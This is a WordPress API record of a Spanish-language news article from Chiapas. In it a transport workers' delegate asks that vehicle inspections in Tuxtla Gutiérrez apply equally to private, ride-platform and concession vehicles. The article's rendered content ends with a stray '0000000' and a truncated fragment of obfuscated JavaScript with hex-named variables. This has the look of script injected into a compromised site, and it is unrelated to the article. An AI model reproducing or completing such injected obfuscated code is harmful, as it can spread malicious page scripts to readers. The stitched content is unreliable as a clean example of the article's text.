{"id":20353,"date":"2025-02-14T03:52:41","date_gmt":"2025-02-14T03:52:41","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20353"},"modified":"2025-02-14T03:52:41","modified_gmt":"2025-02-14T03:52:41","slug":"piden-que-se-aplique-operativo-igualitario-en-tema-de-transporte","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20353","title":{"rendered":"Piden que se aplique operativo igualitario en tema de transporte"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"765\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250213-WA0030-765x1024.jpg\" alt=\"\" class=\"wp-image-20354\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250213-WA0030-765x1024.jpg 765w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250213-WA0030-224x300.jpg 224w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250213-WA0030-768x1027.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250213-WA0030-1148x1536.jpg 1148w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250213-WA0030.jpg 1196w\" sizes=\"auto, (max-width: 765px) 100vw, 765px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>13 de febrero del 2025. Tuxtla Guti\u00e9rrez.- El delegado estatal de la Confederaci\u00f3n Aut\u00e9ntica de los Trabajadores de la Rep\u00fablica Mexicana Roberto Valent\u00edn Gordillo Padilla, hizo un llamado para que exista piso parejo en la aplicaci\u00f3n de los operativos en el transporte p\u00fablico.<\/p>\n\n\n\n<p>Aunque reconoci\u00f3 estas acciones como positivas, tambi\u00e9n existe inconformidad por parte de los due\u00f1os de las unidades que han sido levantadas.<\/p>\n\n\n\n<p>Dijo que, esta inconformidad es por parte de varios compa\u00f1eros quienes se les detuvo la unidad \u201cpues no queda m\u00e1s que invitarlos que est\u00e9n en regla sus conductores principalmente porque muchas veces como due\u00f1os no revisamos los documentos como es el tema del vencimiento de la p\u00f3liza\u201d.<\/p>\n\n\n\n<p>\u201cEs necesario como propietarios de las unidades que brindan este servicio a estas pendiente de las fechas de vencimiento, que los conductores cuenten con la licencia correspondiente, la tarjeta de circulaci\u00f3n\u201d, manifest\u00f3.<\/p>\n\n\n\n<p>Precis\u00f3 que, estos documentos son necesarios tenerlos para que no haya infracciones y se evite llevar las unidades al corral\u00f3n en turno.<\/p>\n\n\n\n<p>\u201cEn este sentido s\u00ed entendemos la inconformidad de los transportistas por ello hacemos el llamado para que estos operativos se apliquen de forma pareja\u201d, coment\u00f3.<\/p>\n\n\n\n<p>Puntualiz\u00f3 que: \u201cEntonces la petici\u00f3n es que el reglamento de la SMyT se aplique tambi\u00e9n a las unidades particulares sobre todo aquellas que prestan este servicio en plataformas, concretamente hablando del tema de los vidrios polarizados, que todo sea parejo\u201d.<\/p>\n\n\n\n<p>\u201cLos transportistas han expresado su malestar debido a que estos operativos pareciera que son contra ellos. El reglamento debe ser aplicado tanto para particulares como transportistas concesionados que exista igualdad para todos los grupos no solo contra unos\u201d, expres\u00f3.<br>0000000<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 13 de febrero del 2025. Tuxtla Guti\u00e9rrez.- El delegado estatal de la Confederaci\u00f3n Aut\u00e9ntica de los Trabajadores de la Rep\u00fablica Mexicana Roberto Valent\u00edn Gordillo Padilla, hizo un llamado para que exista piso parejo en la aplicaci\u00f3n de los operativos en el transporte p\u00fablico. Aunque reconoci\u00f3 estas acciones como positivas, tambi\u00e9n existe inconformidad por &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20354,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-20353","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20353","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20353"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20353\/revisions"}],"predecessor-version":[{"id":20355,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20353\/revisions\/20355"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20354"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20353"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20353"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20353"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}